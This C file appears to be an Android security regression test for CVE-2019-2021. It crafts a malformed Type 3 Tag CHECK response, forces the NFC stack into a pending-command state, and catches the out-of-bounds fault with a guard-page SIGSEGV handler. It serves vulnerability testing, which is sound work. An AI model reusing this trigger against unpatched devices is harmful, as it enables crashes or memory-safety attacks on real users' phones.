
/*
* Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <nfc_int.h>
#include <rw_int.h>
#include <unistd.h>
#include "../includes/common.h"
#include "../includes/memutils.h"
/* Selects which allocation routines the test's interposing hooks act on; the
 * ENABLE_* values come from the shared test includes (presumably memutils.h —
 * confirm). main() switches it between the phases of the test. */
char enable_selective_overload = ENABLE_NONE;
/* Start of the message buffer under test. sigsegv_handler() compares the
 * faulting address against the page that immediately follows this one. */
char *vulnPtr = nullptr;
/* Raised only around the call that exercises the bug, so a SIGSEGV delivered at
 * any other time is reported as a harness failure rather than as the expected fault. */
bool testInProgress = false;
/* The SIGSEGV handler installed by main() and the disposition it replaced. */
struct sigaction new_action, old_action;
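/*
 * SIGSEGV handler installed by main().
 *
 * While a test is in progress, a fault whose address lies on the page that
 * immediately follows the page holding vulnPtr is treated as the outcome the
 * test is looking for (the hooked allocation is presumably followed by a guard
 * page — confirm against memutils.h) and is handed to the disposition that was
 * in place before this handler was installed. Any other SIGSEGV, or one raised
 * outside a test, terminates the process with EXIT_FAILURE so an unrelated
 * crash is not mistaken for the condition under test.
 *
 * The page mask is derived from getpagesize() at runtime instead of a
 * compile-time PAGE_MASK, so the two can never disagree (e.g. on kernels with a
 * non-4K page size). Only async-signal-safe calls are made here
 * (getpagesize, sigaction, _exit).
 */
void sigsegv_handler(int signum, siginfo_t *info, void *context) {
    if (!testInProgress || info->si_signo != SIGSEGV) {
        _exit(EXIT_FAILURE);
    }
    uintptr_t pageSize = (uintptr_t)getpagesize();
    if (pageSize == 0) {
        _exit(EXIT_FAILURE);
    }
    /* Page sizes are powers of two, so this is the usual ~(size - 1) mask. */
    uintptr_t pageMask = ~(pageSize - 1);
    uintptr_t guardPage = ((uintptr_t)vulnPtr & pageMask) + pageSize;
    uintptr_t faultPage = (uintptr_t)info->si_addr & pageMask;
    if (faultPage != guardPage) {
        _exit(EXIT_FAILURE);
    }
    /* Expected fault: defer to the previous disposition. SIG_DFL and SIG_IGN are
     * not callable, so in that case restore the old disposition and return; the
     * faulting instruction then re-executes under it (SIGSEGV is a synchronous
     * fault, so the kernel applies the default action). */
    if ((old_action.sa_flags & SA_SIGINFO) && old_action.sa_sigaction != NULL) {
        old_action.sa_sigaction(signum, info, context);
    } else if (old_action.sa_handler != SIG_DFL && old_action.sa_handler != SIG_IGN) {
        old_action.sa_handler(signum);
    } else {
        sigaction(SIGSEGV, &old_action, NULL);
    }
}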
/* Control blocks owned by the NFC stack that the test writes into directly. */
extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;
/* The crafted connection message built in main() and released by poc_cback(). */
tNFC_CONN *p_data;
/* Stack entry points used by the test, declared here rather than through a
 * public header — presumably because the stack does not export them (confirm). */
void rw_init(void);
tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
uint8_t mrti_check, uint8_t mrti_update);
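/*
 * Allocate 'size' bytes with 16-byte alignment and zero them.
 *
 * Returns the zeroed block, or NULL when memalign fails; the original
 * unconditionally memset() the result, which is a null dereference on
 * failure even though main() checks the return value. Ownership passes to
 * the caller, who releases the block with free(). memalign is used on purpose
 * rather than calloc: the allocation hook selected via enable_selective_overload
 * presumably intercepts memalign — confirm against memutils.h.
 */
void *allocate_memory(size_t size) {
    void *ptr = memalign(16, size);
    if (ptr) {
        memset(ptr, 0x0, size);
    }
    return ptr;
}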
/* States of the T3T reader/writer control block. main() writes one of these
 * straight into rw_cb.tcb.t3t.rw_state, so the numeric values must agree with
 * the ones compiled into the NFC stack — NOTE(review): verify against the
 * stack's private definitions when the stack is updated. */
enum {
RW_T3T_STATE_NOT_ACTIVATED,
RW_T3T_STATE_IDLE,
RW_T3T_STATE_COMMAND_PENDING
};
/* Enumeration of API commands. main() writes one of these into
 * rw_cb.tcb.t3t.cur_cmd; the same value-agreement caveat as above applies. */
enum {
RW_T3T_CMD_DETECT_NDEF,
RW_T3T_CMD_CHECK_NDEF,
RW_T3T_CMD_UPDATE_NDEF,
RW_T3T_CMD_CHECK,
RW_T3T_CMD_UPDATE,
RW_T3T_CMD_SEND_RAW_FRAME,
RW_T3T_CMD_GET_SYSTEM_CODES,
RW_T3T_CMD_FORMAT,
RW_T3T_CMD_SET_READ_ONLY_SOFT,
RW_T3T_CMD_SET_READ_ONLY_HARD,
RW_T3T_CMD_MAX
};
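/*
 * Reader/writer callback registered in main() (rw_cb.p_cback) for the duration
 * of the test.
 *
 * The event and its payload are ignored; the callback's only job is to release
 * the tNFC_CONN message built in main(): first the payload buffer, then the
 * container. p_data is cleared afterwards so a second invocation cannot free
 * the same blocks twice, and an invocation before main() has allocated the
 * message is a no-op instead of a null dereference.
 */
void poc_cback(tRW_EVENT event, tRW_DATA *p_rw_data) {
    (void)event;
    (void)p_rw_data;
    if (!p_data) {
        return;
    }
    free(p_data->data.p_data);
    free(p_data);
    p_data = NULL;
}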
/* No-op stand-in for the GKI timer start routine: nothing in this test needs a
 * timer to fire. Presumably takes the place of the stack's own definition at
 * link time — confirm with the build rules. Parameters are intentionally unnamed. */
void GKI_start_timer(uint8_t, int32_t, bool) {
}
/* No-op stand-in for the GKI timer stop routine, matching GKI_start_timer above. */
void GKI_stop_timer(uint8_t) {
}
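/*
 * Regression test for CVE-2019-2021 (T3T handling in the NFC reader/writer
 * module).
 *
 * Flow: install a SIGSEGV handler that only passes on a fault on the page
 * after the message buffer; bring the RW module up with poc_cback() as its
 * callback; select a T3T target with the memalign hook active; build a
 * tNFC_CONN message whose payload is a CHECK response with status OK; put the
 * T3T control block into COMMAND_PENDING / DETECT_NDEF; and finally hand the
 * message to the RF connection callback with the free/realloc hooks active.
 * What the stack does with that message is the code under test; poc_cback()
 * releases the message from inside that call.
 *
 * Returns EXIT_SUCCESS when the stack handles the message without faulting;
 * harness failures go through FAIL_CHECK, and the SIGSEGV handler decides the
 * outcome of a fault.
 *
 * Fixes relative to the original: the old disposition is only trusted when
 * sigaction() succeeded, peer_nfcid2 no longer passes indeterminate bytes to
 * rw_t3t_select(), and the allocation-failure path no longer reads
 * p_data->data.p_data after free(p_data).
 */
int main() {
    sigemptyset(&new_action.sa_mask);
    new_action.sa_flags = SA_SIGINFO;
    new_action.sa_sigaction = sigsegv_handler;
    /* Without the handler in place the guard-page check can never run. */
    FAIL_CHECK(sigaction(SIGSEGV, &new_action, &old_action) == 0);

    tRW_T3T_CB *p_t3t = &rw_cb.tcb.t3t;
    GKI_init();
    rw_init();
    rw_cb.p_cback = &poc_cback;

    /* Zero-initialised: the selected ID does not matter here, and the stack
     * previously received whatever happened to be on the stack. */
    uint8_t peer_nfcid2[NCI_RF_F_UID_LEN] = {0};
    uint8_t mrti_check = 1, mrti_update = 1;
    enable_selective_overload = ENABLE_MEMALIGN_CHECK;
    FAIL_CHECK((rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) == NFC_STATUS_OK));

    /* Both allocations go through the hooked memalign (still selected above). */
    p_data = (tNFC_CONN *)allocate_memory(sizeof(tNFC_CONN));
    FAIL_CHECK(p_data);
    p_data->data.p_data = (NFC_HDR *)allocate_memory(sizeof(NFC_HDR) * 3);
    enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
    /* Keep a local copy so the failure path does not touch p_data after freeing it. */
    NFC_HDR *p_msg = p_data->data.p_data;
    if (!p_msg) {
        free(p_data);
        p_data = NULL;
        FAIL_CHECK(p_msg);
    }
    vulnPtr = (char *)p_msg;
    p_data->status = NFC_STATUS_OK;

    /* Make the stack believe a DETECT_NDEF command is outstanding. */
    p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
    p_t3t->cur_cmd = RW_T3T_CMD_DETECT_NDEF;

    /* Craft the response payload. p_msg->offset is 0 because allocate_memory()
     * zeroed the buffer, so the payload starts right after the header plus one byte. */
    p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;
    uint8_t *p_t3t_rsp = (uint8_t *)(p_msg + 1) + (p_msg->offset + 1);
    p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
    p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;

    tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
    tNFC_CONN_EVT event = NFC_DATA_CEVT;
    /* The stack presumably compares the IDm in the response with the selected
     * peer; make them match (confirm against the stack source). */
    memcpy(p_t3t->peer_nfcid2, &p_t3t_rsp[T3T_MSG_RSP_OFFSET_IDM],
           NCI_NFCID2_LEN);

    /* Only a SIGSEGV raised inside this call is eligible for the guard-page check. */
    testInProgress = true;
    p_cb->p_cback(0, event, p_data);
    testInProgress = false;
    return EXIT_SUCCESS;
}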